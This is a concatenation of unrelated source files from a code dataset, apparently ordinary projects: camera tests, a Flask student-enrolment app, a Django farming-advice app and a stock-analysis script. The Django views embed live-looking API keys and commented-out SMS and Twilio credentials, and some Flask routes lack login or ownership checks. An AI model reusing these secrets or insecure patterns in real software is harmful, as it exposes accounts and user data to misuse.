self.assertEqual(self.feat_r.get_type(), StringFeature)\n        self.assertEqual(self.feat_rw.get_type(), StringFeature)\n\n    def test_get(self):\n        # Expectation: Get current value without raising an exception\n        self.assertNoRaise(self.feat_r.get)\n        self.assertNoRaise(self.feat_rw.get)\n\n    def test_get_max_length(self):\n        # Expectation: Get maximum string length\n        self.assertNoRaise(self.feat_r.get_max_length)\n        self.assertNoRaise(self.feat_rw.get_max_length)\n\n    def test_set(self):\n        # Expectation:\n        # 1) Setting a read only feature must raise a VimbaFeatureError\n        # 2) Setting a read/write feature must raise VimbaFeatureError if the string is\n        #    longer than the max length\n        # 3) Setting a read/write feature must work if the string is short enough\n\n        # Ensure Expectation 1\n        self.assertRaises(VimbaFeatureError, self.feat_r.set, self.feat_r.get())\n        self.assertNoRaise(self.feat_rw.set, self.feat_rw.get())\n\n        # Ensure Expectation 2\n        old_val = self.feat_rw.get()\n\n        try:\n            invalid = 'a' * self.feat_rw.get_max_length()\n            self.assertRaises(VimbaFeatureError, self.feat_rw.set, 
invalid)\n\n        finally:\n            self.feat_rw.set(old_val)\n\n        # Ensure Expectation 3\n        try:\n            valid = 'a' * (self.feat_rw.get_max_length() - 1)\n            self.assertNoRaise(self.feat_rw.set, valid)\n            self.assertEqual(valid, self.feat_rw.get())\n\n        finally:\n            self.feat_rw.set(old_val)\n\n    def test_set_in_callback(self):\n        # Expectation: Setting a value within a Callback must raise a VimbaFeatureError\n\n        class Handler:\n            def __init__(self):\n                self.raised = False\n                self.event = threading.Event()\n\n            def __call__(self, feat):\n                try:\n                    feat.set(feat.get())\n\n                except VimbaFeatureError:\n                    self.raised = True\n\n                self.event.set()\n\n        try:\n            handler = Handler()\n            self.feat_rw.register_change_handler(handler)\n\n            self.feat_rw.set(self.feat_rw.get())\n\n            handler.event.wait()\n\n            self.assertTrue(handler.raised)\n\n        finally:\n            self.feat_rw.unregister_change_handler(handler)\n","sub_path":"Tests/real_cam_tests/feature_test.py","file_name":"feature_test.py","file_ext":"py","file_size_in_byte":27771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"537554696","text":"from flask import render_template, redirect, request, url_for, flash, abort\nfrom flask_login import login_user, logout_user, login_required, \\\n    current_user\nfrom . import student\nfrom .. import db\nfrom ..models import User, Student, Session, Permission\nfrom ..email import send_email\nfrom .forms import NewStudentForm, RegisterSessionForm, EditProfileForm\nfrom ..decorators import authority_required\n\n\n#ST1\n@student.route('/student?student=<student_id>', methods=['GET', 'POST'])\n@login_required\ndef profile(student_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    user_id = student.user_id\n    user = User.query.filter_by(id=user_id).first_or_404()\n    sessions = student.get_sessions()\n    if not current_user.has_student(student) and not current_user.is_admin() \\\n            and not current_user.is_teacing(student):\n        abort(403)\n    return render_template('student/student.html', student=student, user=user, sessions=sessions)\n\n\n#ST2\n@student.route('/add?user=<user_id>', methods=['GET', 'POST'])\n@login_required\n@authority_required(Permission.ADMIN)\ndef addstudent(user_id):\n    form = NewStudentForm()\n    if form.validate_on_submit():\n        student = Student(last_name = form.lastname.data,\n                          first_name = form.firstname.data,\n                          middle_name = form.middlename.data,\n                          chinese_name = form.chname.data,\n                          birthday = form.birthday.data,\n                          user = User.query.filter_by(id=user_id).first_or_404())\n        db.session.add(student)\n        db.session.commit()\n        return redirect(url_for('user.account', user_id=user_id))\n    return render_template(\"student/addstudent.html\", form=form)\n\n\n#ST3\n@student.route('/edit?student=<student_id>', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(student_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    form = EditProfileForm()\n    if form.validate_on_submit():\n        student.last_name = form.lastname.data\n        student.first_name = form.firstname.data\n        student.middle_name = form.middlename.data\n        student.chinese_name = form.chinesename.data\n        db.session.add(student)\n        flash('The student profile has been updated.')\n        return redirect(url_for('.profile', student_id=student.id))\n    form.firstname.data = student.first_name\n    form.lastname.data = student.last_name\n    form.middlename.data = student.middle_name\n    form.chinesename.data = student.chinese_name\n    return render_template('student/edit_student.html', form=form, student=student)\n
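\n\n# The angle-bracket segments in these routes (e.g. <student_id>) are Flask\n# URL converters; Flask passes each one to the view as the keyword argument\n# of the same name.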
\n\n#S\n@student.route('/sessionlist??student=<student_id>', methods=['GET', 'POST'])\n@login_required\ndef sessionlist(student_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    sessions = Session.query.all()\n    return render_template('student/sessionlist.html', sessions=sessions, student=student)\n\n\n#ST4\n@student.route('/register?student=<student_id>&session=<session_id>', methods=['GET', 'POST'])\n@login_required\ndef register(student_id, session_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    session = Session.query.filter_by(id=session_id).first_or_404()\n    student.register(session)\n    flash('Student %s is now enrolled.' % (student.first_name))\n    return redirect(url_for('.profile', student_id=student.id))\n\n\n@student.route('/register?student=<student_id>', methods=['GET', 'POST'])\n@login_required\ndef enroll(student_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    # the target session is expected as a 'session_id' query parameter\n    session_id = request.args.get('session_id')\n    session = Session.query.filter_by(id=session_id).first_or_404()\n    student.register(session)\n    flash('You are now enrolled.')\n    return redirect(url_for('.profile', student_id=student.id))\n\n\n#ST5\n@student.route('/browse', methods=['GET', 'POST'])\ndef browse():\n    students = Student.query.all()\n    return render_template(\"student/student_browse.html\", students=students)\n\n@student.route('/quit?student=<student_id>&session=<session_id>', methods=['GET', 'POST'])\ndef quit(student_id, session_id):\n    pass\n\n\n@student.route('/delete?student=<student_id>', methods=['GET', 'POST'])\ndef delete(student_id):\n    student = Student.query.filter_by(id=student_id).first_or_404()\n    if not current_user.has_student(student) and not current_user.is_admin():\n        abort(403)\n    db.session.delete(student)\n    db.session.commit()\n    flash('Student is deleted.')\n    return render_template('ccl.html')","sub_path":"web/app/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"281476076","text":"import shapefile\n\nfile = raw_input()\nfield = raw_input()\nvalue = raw_input()\nfieldShow = raw_input()\n\n##file=r'C:\\Layers\\Lakes.shp'\n##field = 'id'\n##value = '500460'\n##fieldShow = 'name'\n\n##file=r'D:\\GeoServer 2.11.1\\data_dir\\data\\ELake\\Base\\adm1pol.shp'\n##field = 'kato_te'\n##value = '110000000'\n##fieldShow = 'name_adm1'\n\nsf = shapefile.Reader(file)\nfieldIndex = 1\ncurrentIndex = 0\nfieldIndexShow = 1\ncurrentIndexShow = 0\nfor sr in sf.fields:\n    currentIndex += 1\n    currentIndexShow += 1\n    if field == sr[0]:\n        fieldIndex = currentIndex\n    if fieldShow == sr[0]:\n        fieldIndexShow = currentIndexShow\n\nfieldIndex = fieldIndex - 1\nfieldIndexShow = fieldIndexShow - 1\nr = ''\nfor sr in sf.shapeRecords():\n    if(str(sr.record[fieldIndex-1:fieldIndex][0]) == value):\n        r = sr.record[fieldIndexShow-1:fieldIndexShow][0]\n        break\n\nprint (r.decode('utf-8'))\n##print r\n","sub_path":"ELake/Python/GetFeatureField.py","file_name":"GetFeatureField.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"334916563","text":"import configparser\nfrom conf.project_path import *\n\nclass ReadConfigFile():\n    def __init__(self):\n        self.config = configparser.ConfigParser()\n        self.config.read(conf_path+\"/config.ini\")\n\n    def get_env(self):\n        env_value = str(self.get_value(\"env\",\"run_env\"))\n        print(\"************\", env_value)\n        domain_value = self.get_value(env_value,\"domain\")\n        url_value = self.get_value(env_value, \"url\")\n        return domain_value, url_value\n\n    def get_devicesinfo(self):\n        devicesvalue = self.get_value(\"devices\", 
\"devicesinfo\")\n uid=self.get_value(\"devices\", \"uid\")\n query_replyinfo=self.get_value(\"devices\",\"query_reply_info\")\n return uid,devicesvalue,query_replyinfo\n\n def get_value(self,section_value,option_value):\n value = self.config.get(section_value, option_value)\n return value\n","sub_path":"AITEST/conf/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"581281048","text":"\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.db import IntegrityError\nfrom django.contrib.auth import authenticate, login, logout\nimport json\nimport urllib.request\nimport requests\nfrom django.contrib import auth\nimport os\nfrom django.contrib.auth.models import User\nfrom .models import LoanSchemeForFarmers\nfrom .models import CropInfo\nfrom .models import extendeduser\nimport json\nfrom .models import approvals\nfrom .models import MarketPrices\nfrom .models import PestControl\nfrom .models import WillPlant\nfrom django.contrib.auth.decorators import login_required\n#import twilio\n# from twilio.rest import Client\nimport threading\nimport datetime\nuser_data=extendeduser.objects.values('phone','town','user')\ndef printit():\n threading.Timer(10, printit).start()\n for i in user_data:\n city = i['town']\n src = 'http://api.openweathermap.org/data/2.5/weather?appid=e995a3bb90b825a2202b9786e17caa56&q='\n url = src + city\n list_of_data = requests.get(url).json()\n temp = list_of_data['main']['temp']\n newtmp = round(temp - 273.15, 3)\n condition = list_of_data['weather'][0]['description']\n humidity = list_of_data['main']['humidity']\n data = {\n \"city\": city,\n \"temp\": newtmp,\n \"humidity\": humidity,\n \"condition\": condition,\n \"icon\": str(list_of_data['weather'][0]['icon']),\n }\n print(data)\n if data['condition']==\"overcast clouds\":\n pass\n print('\\n'+city,' user '+str(i['user'])+' overcast condition',end='\\n')\n\n\n# printit()\ndef index(request):\n return render(request, 'accounts/basic.html')\n\ndef Farmer(request):\n return render(request, 'accounts/FarmerPage.html')\n\ndef home(request):\n return render(request, 'accounts/basic.html')\ndef Admin(request):\n return render(request, 'accounts/AdminPage.html')\n\n\ndef userpage(request):\n return render(request, 'accounts/index.html')\n\ndef handlelogin(request):\n if request.method == \"POST\":\n uname1 = request.POST['uname1']\n pass3 = request.POST['pass3']\n user = auth.authenticate(username=uname1, password=pass3)\n if user is not None:\n auth.login(request, user)\n datas = extendeduser.objects.filter(user=request.user)\n messages.success(request, \"Successfully logged in\")\n if request.user.is_superuser:\n return redirect(\"admin\")\n data = str(datas[0].cat)\n if data == \"Farmer\":\n return redirect('farmer')\n #return render(request,'accounts/FarmerPage.html')\n elif data == \"Admin\":\n return redirect('admin')\n #return render(request, 'accounts/AdminPage.html')\n else:\n messages.error(request, \"Invalid Credentials\")\n return render(request, 'accounts/basic.html')\n else:\n return HttpResponse('NOT allowed')\n\ndef Addschemes(request):\n return render(request, 'accounts/AddSchemes.html')\n\ndef weather(request):\n try:\n if request.method == 'POST':\n city = request.POST['city']\n if len(city) == 0:\n messages.error(request, \"Enter city name\")\n return render(request, 'accounts/weather.html')\n src 
= 'http://api.openweathermap.org/data/2.5/weather?appid=e995a3bb90b825a2202b9786e17caa56&q='\n            url = src + city\n            list_of_data = requests.get(url).json()\n            temp = list_of_data['main']['temp']\n            newtmp = round(temp - 273.15, 3)\n            condition = list_of_data['weather'][0]['description']\n            humidity = list_of_data['main']['humidity']\n            data = {\n                \"city\": city,\n                \"temp\": newtmp,\n                \"humidity\": humidity,\n                \"condition\": condition,\n                \"icon\": str(list_of_data['weather'][0]['icon']),\n            }\n            return render(request, 'accounts/weather.html', data)\n    except:\n        messages.error(request, \"Please enter a valid city name\")\n        return render(request, 'accounts/weather.html')\ndef handlelogout(request):\n    logout(request)\n    messages.success(request, \"Successfully logged out\")\n    return render(request, 'accounts/basic.html')\n\ndef adminpanel(request):\n    if request.method == 'POST':\n        info = str(request.POST['dos'])\n        name = str(request.POST['tos'])\n        l = LoanSchemeForFarmers()\n        l.info = info\n        l.scheme_name = name\n        l.save()\n        euser=extendeduser.objects.values('phone','user')\n        q=[]\n        for j in euser:\n            q.append(j['phone'])\n\n        # url = \"https://www.fast2sms.com/dev/bulk\"\n        # querystring = {\"authorization\": \"ycJbOn8xXkgUB5j9ZTpM2hDHrYvFt4IzsNlSmAfLeaoGPiEKR7jiZe3wOzktNoFS8Ahr6TgQqvyPW9LV\", \"Kissan-Mithra\", \"message\": info+\"Scheme updated on Kissan Mithra\",\n        #               \"language\": \"english\", \"route\": \"p\", \"numbers\":q}\n        # headers = {\n        #     'cache-control': \"no-cache\"\n        # }\n        # response = requests.request(\"GET\", url, headers=headers, params=querystring)\n        # print(response.text)\n\n        #zerosms.sms(phno=9689914109, passwd=password, message='helloworld!!', receivernum=receiver mobilenumber)\n        # #SMS Notification\n        # if p=='8830502656':\n        #     account_sid = 'ACa522720e1d991ba02ac1afec621f3ed4'\n        #     auth_token = 'f284dae9dfc1886dfe099fb75b0908a7'\n        #     client = Client(account_sid, auth_token)\n        #\n        #     message = client.messages.create(\n        #         body=l.scheme_name+\" Scheme Info: \"+l.info,\n        #         from_='+12183166674',\n        #         to='+918830502656'\n        #     )\n        #\n        #     print(message.sid)\n\n    return render(request, 'accounts/AdminPanel.html')\n@login_required(login_url='/basic/')\ndef signup(request):\n    try:\n        #if request.method == 'POST':\n        uname = request.POST['uname']\n        email = request.POST['email']\n        fname = request.POST['fname']\n        lname = request.POST['lname']\n        phone = request.POST['phone']\n        cat = request.POST['cat']\n        town=request.POST['town']\n        pass1 = request.POST['pass1']\n        pass2 = request.POST['pass2']\n        if len(uname)<6:\n            messages.error(request, \"Username must be at least 6 characters\")\n            return render(request, 'accounts/basic.html')\n        if pass1!=pass2:\n            messages.error(request, \"Passwords do not match\")\n            return render(request, 'accounts/basic.html')\n        if len(pass1)<6:\n            messages.error(request, \"Password must be at least 6 characters\")\n            return render(request, 'accounts/basic.html')\n        user = User.objects.create_user(uname, email, pass1)\n        user.first_name = fname\n        user.last_name = lname\n        user.save()\n        newuser = extendeduser(phone=phone, cat=cat,town=town, user=user)\n        newuser.save()\n        messages.success(request, \"Your KissanMithra Account has been Created Successfully\")\n        euser = extendeduser.objects.values('phone', 'user')\n        #url=\"https://www.fast2sms.com/dev/bulkV2\"\n        #querystring = {\n        #    \"authorization\": \"2q6jELcGXbfUtkxZaWDVMOs89YghdiHyuRm1lInz0Sw3KpBQT5ncm4yFvCsPZBugbAfe2tz0rhG7iOSa\",\n        #    \"sender_id\": \"Kissan-Mithra\", \"message\": \"your Kissan-Mithra has been created successfully\\n Your Username is \"+uname+\"\\nPassword is 
\"+pass1+\"\\n If you have any query call on below Number \\nCustomerCare No:7560941330\",\n # \"language\": \"english\", \"route\": \"p\", \"numbers\": phone}\n # headers = {\n # 'cache-control': \"no-cache\"\n # }\n # response = requests.request(\"GET\", url, headers=headers, params=querystring)\n # print(response.text)\n return render(request, 'accounts/basic.html')\n except:\n messages.error(request, \"User with this information already exists\")\n return render(request, 'accounts/basic.html')\ndef addcrop(request):\n if request.method == 'POST':\n cropinfo = str(request.POST['cropinfo'])\n cropname = str(request.POST['cropname'])\n cropimg = str(request.POST['cropimg'])\n c = CropInfo()\n c.crop_name = cropname\n c.crop_info = cropinfo\n c.img='accounts/images/'+cropimg\n c.save()\n return render(request, 'accounts/AdminPanel.html')\n\ndef getPrediction(district,c_season):\n x = approvals()\n x = x.predict(district, c_season)\n return x\ndef get_data():\n crops = CropInfo.objects.values('crop_name', 'crop_info')\n return crops\n\n\nclass my_dictionary(dict):\n\n # __init__ function\n def __init__(self):\n self = dict()\n\n # Function to add key:value\n\n def add(self, key, value):\n self[key] = value\n\ndef govtschemes(request):\n l=LoanSchemeForFarmers.objects.values('scheme_name','info')\n lis=[]\n for i in l:\n lis.append(i)\n dic={'dic':lis}\n print(dic)\n return render(request,'accounts/govschemes.html',dic)\n\ndef addPest(request):\n if request.method=='POST':\n pest=request.POST.get('pest')\n district=request.POST.get('district')\n crop=request.POST.get('crop')\n\n source = urllib.request.urlopen(\n 'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp=round(list_of_data['main']['temp']-273.15)\n rain=897\n humidity=(list_of_data['main']['humidity'])\n windspeed=(list_of_data['wind']['speed'])\n c=PestControl()\n c.AddPest(district,temp,rain,humidity,windspeed,crop,pest)\n return render(request, 'accounts/addpest.html')\ndef predictPest(request):\n data={}\n if request.method=='POST':\n district = request.POST.get('district')\n crop = request.POST.get('crop')\n crop=crop.capitalize()\n\n p = PestControl()\n source = urllib.request.urlopen(\n 'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp = round(list_of_data['main']['temp'] - 273.15)\n rain = 897\n humidity = (list_of_data['main']['humidity'])\n wind = (list_of_data['wind']['speed'])\n\n x = p.PredictPest(crop, district, temp, rain, humidity, wind)\n data['data']=x\n return render(request, 'accounts/predictpest.html',data)\n\ndef viewcrop(request):\n if request.method=='POST':\n data=''\n val=request.POST.get('crop-name')\n print(val)\n crop=CropInfo.objects.values('crop_name', 'crop_info','img')\n return render(request,'accounts/'+val+'.html')\n # for i in crop:\n # if i['crop_name']==val:\n # data=i['crop_info']\n # data={'data':i}\n # return render(request, 'accounts/viewcrop.html',data)\n else:\n return HttpResponse('NO CROP SELECTED')\n\ndef predictMPG(request):\n\n if request.method=='GET':\n context={'zz':1}\n if request.method == 'POST':\n w=WillPlant.objects.values('user','crop','town')\n temp3 = {}\n temp3['District'] = request.POST.get('District4')\n temp3['District'] = temp3['District'].upper()\n district=temp3['District']\n p = PestControl()\n source = urllib.request.urlopen(\n 
'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp = round(list_of_data['main']['temp'] - 273.15)\n rain = 897\n humidity = (list_of_data['main']['humidity'])\n wind = (list_of_data['wind']['speed'])\n temp3['Season'] = (request.POST.get('Season1'))\n\n c_season = int(temp3['Season'])\n season = ''\n\n x = getPrediction(district, c_season)\n # if c_season == 0:\n # season = \"Current Season\"\n crops = CropInfo.objects.values('crop_name', 'crop_info', 'img')\n crop_found = []\n pest_found = {}\n pest = []\n croppest = {}\n list_planted_crop=[]\n for i in w:\n if i['town']==district:\n list_planted_crop.append(i['crop'])\n print(list_planted_crop)\n if c_season == 1:\n season = 'Kharif'\n elif c_season == 2:\n season = 'Rabbi'\n elif c_season == 3:\n season = 'Whole Year'\n elif c_season == 4:\n season = 'No specific season'\n elif c_season == 5:\n season='All Seasons Without Previous Year Prod'\n for i in x[0]:\n for j in crops:\n z = i\n if j['crop_name'] == z:\n count_of_crop = list_planted_crop.count(z)\n j['count'] = count_of_crop\n if count_of_crop > 1:\n j['danger'] = 1\n else:\n j['safe']=1\n t = p.PredictPest(z, district, temp, rain, humidity, wind)\n n = len(crops)\n pest.append(t)\n pest_found[z] = t\n crop_found.append(j)\n croppest[z] = t\n\n context = {'crop': x[0], 'district': temp3['District'], 'season': season, 'predicted_crops': x[0],\n 'found': crop_found, 'pest': pest_found, 'croppest': croppest}\n return render(request, 'accounts/predict.html', context)\n\n for i in range(0,len(x[1])):\n for j in crops:\n z=(x[1][i][0])\n if j['crop_name']==z:\n count_of_crop=list_planted_crop.count(z)\n j['count']=count_of_crop\n if count_of_crop>1:\n j['danger']=1\n else:\n j['safe']=1\n print(z,count_of_crop)\n t = p.PredictPest(z, district, temp, rain, humidity, wind)\n n = len(crops)\n pest.append(t)\n pest_found[z]=t\n crop_found.append(j)\n croppest[z]=t\n\n context = {'crop': x[1],'district':temp3['District'],'season':season,'predicted_crops':x[0],'found':crop_found,'pest':pest_found,'croppest':croppest}\n # context={}\n return render(request, 'accounts/predict.html', context)\n\ndef getPredictionNoPrevious(district,c_season):\n x = approvals()\n x = x.predict(district, c_season)\n return x\n\ndef predictwithoutprevious(request):\n context={}\n return render(request, 'accounts/predict.html', context)\n\n\ndef showweather(request):\n return render(request, 'accounts/weather.html')\n\n\ndef marketforuser(request):\n m_prices=MarketPrices.objects.values('town','crop','market','date','price')\n lis=[]\n for i in m_prices:\n print(i)\n lis.append(i)\n dic={'prices':lis}\n return render(request,'accounts/marketforuser.html',dic)\n\ndef willplant(request):\n if request.method=='POST':\n flg=0\n crop=request.POST.get('crop-name')\n dis=request.POST.get('district')\n # w=willplant()\n print(crop,dis,request.user)\n # w.user=reques t.user\n # w.town=''\n # w.crop=crop\n will_plant=WillPlant.objects.values('user','crop','town')\n\n for i in will_plant:\n print(i['user'],i['crop'],i['town'],request.user,crop,dis)\n if str(i['user'])==str(request.user) and str(i['crop']) == str(crop) and str(i['town']) == str(dis):\n flg=1\n if flg==0 or len(will_plant)==0:\n w = WillPlant()\n w.user = str(request.user)\n w.town = str(dis)\n w.crop = str(crop)\n w.save()\n print('added successfully')\n else:\n print('failed')\n print(will_plant)\n return 
render(request,'accounts/FarmerPage.html')\n\ndef userinfo(request):\n userdata=[]\n urs=extendeduser.objects.values('phone','cat','town','user')\n for i in urs:\n userdata.append(i)\n userdata={'userdata':userdata}\n return render(request,'accounts/userinfo.html',userdata)\n\ndef cropcountadminview(request):\n will_plant = WillPlant.objects.values('user', 'crop', 'town')\n lis=[]\n for i in will_plant:\n lis.append(i)\n croplist=[]\n for i in lis:\n croplist.append(i['crop'])\n croplist = list(set(croplist))\n citylist=[]\n for i in lis:\n croplist.append(i['crop'])\n citylist = list(set(citylist))\n lis2=[]\n cnt=0\n dic2={}\n # for i in range(0,len(croplist)):\n # for j in range(1,len(lis)):\n # if lis[j]['crop']==croplist[i] and lis[j]['town']==citylist[i]:\n # dic2[croplist[j]]=croplist[i]\n # print(dic2)\n lis=sorted(lis, key=lambda i: i['town'])\n # lis=sorted(lis,key=lambda i: i['crop'])\n dic={'dic':lis}\n # print(dic)\n return render(request,'accounts/cropcountadminview.html',dic)\n\ndef adminmarketadd(request):\n print(request.user)\n z={'z':1}\n if request.method=='POST':\n dis = request.POST.get('District4')\n crop=request.POST.get('crop')\n market=request.POST.get('market')\n price=request.POST.get('price')\n date=datetime.datetime.now()\n print(dis,crop,market,date)\n marketprice=MarketPrices.objects.values('town','market','crop','price','date')\n for i in marketprice:\n if i['town']==dis and crop==i['crop'] and market==i['market']:\n i['price']=price\n item=MarketPrices.objects.get(town=dis,market=market,crop=crop)\n print(item)\n item.delete()\n marketpricenew=MarketPrices()\n marketpricenew.town=dis\n marketpricenew.market=market\n marketpricenew.crop=crop\n marketpricenew.price=price\n marketpricenew.date=date\n marketpricenew.save()\n\n return render(request,'accounts/adminmarketadd.html',z)\n\ndef schemepmkisan(request):\n if request.method=='POST':\n name=request.POST.get('schemename')\n print(name)\n return render(request,'accounts/'+name+'.html')\n\ndef pestinformation(request):\n return render(request,'accounts/pestinformation.html')\ndef LeafSpot(request):\n return render(request,'accounts/Leaf Spot or Sigatoka.html')\ndef PanamaWilt(request):\n return render(request,'accounts/Panama Wilt.html')\ndef AmricanBollWarm(request):\n return render(request, 'accounts/Amrican Boll Warm.html')\ndef PinkBollWarm(request):\n return render(request, 'accounts/Pink Boll Warm.html')\ndef Leafhopper(request):\n return render(request, 'accounts/Leaf hopper.html')\ndef Cornworm(request):\n return render(request, 'accounts/Corn worm.html')\ndef PotatoLateBlightPhytophthorainfestans(request):\n return render(request, 'accounts/Potato Late Blight Phytophthora infestans.html')\ndef Earlyshootborer(request):\n return render(request, 'accounts/Early shoot borer.html')\n","sub_path":"KissanMithra/KissanMithra/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466833229","text":"# python 3.6 32bit\n# installed package\n# 1. mysql-connector-python\n# 2. sqlalchemy\n# 3. odo and [datapipelines, networkx 1.11, cassiopeia]\n# 4. pandas\n# 5. numpy\n# 6. matplotlib\n# 7. 
sklearn\n\nimport logging\nimport sys\nimport time\nimport smwjsql.query as qu\nimport pandas as pd\nimport numpy as np\nimport const.const as ic\nimport matplotlib.pyplot as plt\nfrom logging.handlers import TimedRotatingFileHandler\nfrom sqlalchemy import create_engine\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\ndef logger_start():\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n formatter = logging.Formatter('[%(levelname)s:%(lineno)s] %(asctime)s > %(message)s')\n logger = logging.getLogger()\n\n fh = TimedRotatingFileHandler(\"./analyze\", when=\"midnight\")\n fh.setFormatter(formatter)\n fh.suffix = \"_%Y%m%d.log\"\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n logger.setLevel(logging.DEBUG)\n\n return logger\n\n\ndef orm_init():\n scott = ic.config[\"user\"]\n tiger = ic.config[\"password\"]\n host = ic.config[\"host\"]\n bind = 'mysql+mysqlconnector://' + scott + ':' + tiger + '@' + host + ':3306/smwj'\n\n # DBSession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n # db_session = DBSession()\n\n return create_engine(bind)\n\n\ndef query(sql):\n result = pd.read_sql(sql, engine)\n\n return result\n\n\ndef add_label(df):\n result_df = pd.DataFrame(df['kospi_close'].shift(-1))\n result_df['org'] = df['kospi_close']\n result_df['max'] = result_df['kospi_close'][::-1].rolling(window=5, center=False).max()[::-1]\n result_df['max_rate'] = ((result_df['max'] / result_df['org'] - 1) * 100).round(2)\n result_df.loc[result_df['max_rate'] > 0.6, 'label'] = 1\n result_df['label'] = result_df['label'].fillna(0)\n\n return result_df\n\n\ndef add_plain_variable(df):\n result_df = df.copy()\n anal_temp = result_df.copy()\n days = [1, 5, 10, 20, 40, 60]\n for col in anal_temp.columns:\n for day in days:\n result_df[col + str(day)] = ((result_df[col] / result_df[col].shift(day) - 1) * 100).round(2)\n\n del anal_temp\n\n return result_df\n\n\ndef add_cumsum_variable(df):\n result_df = df.copy()\n anal_temp = result_df.copy()\n days = [2, 5, 10, 20, 40, 60]\n for col in anal_temp.columns:\n for day in days:\n result_df[col + str(day)] = result_df[col].rolling(day).sum()\n\n del anal_temp\n\n return result_df\n\n\n# some env setting\npd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\n\n# variable init\nlogger = logger_start()\nengine = orm_init()\ntoday = time.strftime(\"%Y%m%d\")\n\n# data load\n# df = kospi_data_load()\ndf = query(qu.magic)\n\n# data copy\nanal = df.copy()\n\n# data info\nanal.info()\nanal.describe()\nanal.hist(bins=50, figsize=(20, 15))\n# correlation of diff_rate\ncorr_mat = anal.corr()\ncorr_mat[\"diff_rate\"].sort_values(ascending=False)\n\n# data transform\n# 1. preparing label\nanal_tmp = add_label(anal)\nanal_label_train = anal_tmp['label'][81:981]\nanal_label_test = anal_tmp['label'][981:]\nanal_label_train.shape\nanal_label_test.shape\ndel anal_tmp\n# len(anal_tmp.loc[anal_tmp['label'] == 1]) # 10days: 499, 5days: 339, 3days: 238\n# anal_tmp.head(30)\n\n\n# 2 dropping useless column\nanal_plain_pp = anal.loc[:, ['volume', 'fx_close', 'mmf']]\nanal_cumsum_pp = anal.loc[:, ['kospi_fore', 'kospi_inst', 'futures_fore', 'futures_inst']]\n# anal_scaled.describe()\n# anal_scaled = anal_scaled.drop('label', axis=1)\n\n# 3. 
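# Editor's sketch (not in the original): the manual shift-and-divide used by
# add_plain_variable() is equivalent to pandas' built-in pct_change. A tiny
# standalone check:
import pandas as pd

s = pd.Series([100.0, 102.0, 99.0, 103.0])
manual = ((s / s.shift(1) - 1) * 100).round(2)
builtin = (s.pct_change(periods=1) * 100).round(2)
assert manual.equals(builtin)  # both give [NaN, 2.0, -2.94, 4.04]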
adding diff rate between present and 1, 5, 10, 20, 40, 60days ago\nanal_plain_pp = add_plain_variable(anal_plain_pp)\nanal_cumsum_pp = add_cumsum_variable(anal_cumsum_pp)\nanal_pp = anal_plain_pp.merge(anal_cumsum_pp, left_index=True, right_index=True)\nanal_pp_train = anal_pp[81:981]\nanal_pp_test = anal_pp[981:]\nanal_pp_train.head(10)\nanal_pp_train.shape\nanal_pp_test.shape\ndel anal_pp\n\n# 4. data scaling\n# stardardized scaling\nanal_pipeline = Pipeline([('std_scaler', StandardScaler())])\nanal_train = anal_pipeline.fit_transform(anal_pp_train)\nanal_test = anal_pipeline.fit_transform(anal_pp_test)\n# anal_train = pd.DataFrame(anal_ss, columns=anal_pp.columns)\n# anal_train.head(70)\n# anal_train.describe()\n\n# 5. Random Forest\nrf_clf = RandomForestClassifier()\nrf_clf.fit(anal_train, anal_label_train)\nrf_score = cross_val_score(rf_clf, anal_train, anal_label_train, scoring='neg_mean_squared_error', cv=10)\nrf_rmse_score = np.sqrt(-rf_score)\nrf_rmse_score\n\n# 6. preparing test data\npredict = rf_clf.predict(anal_test)\nresult = pd.DataFrame([predict, anal_label_test.values], columns=['pred', 'actual'])\nround(len(result.loc[result['actual'] == result['pred']]) / len(result) * 100, 2)\n\n# max drawdown\nadd = df.copy()\n\nwindow = 20\nroll_max = df[\"close\"].rolling(window, min_periods=1).max()\ndaily_drawdown = df[\"close\"] / roll_max - 1.0\nmax_daily_drawdown = daily_drawdown.rolling(window, min_periods=1).min()\n\ndaily_drawdown.plot()\nmax_daily_drawdown.plot()\nplt.xticks(add['tran_day'].values)\nplt.show()\n","sub_path":"analysis/kospi_eda.py","file_name":"kospi_eda.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"77990236","text":"from django.db.models.signals import post_save, pre_save\nfrom .models import User\nfrom django.dispatch import receiver\nfrom django.template.loader import render_to_string\nfrom django.core.mail import 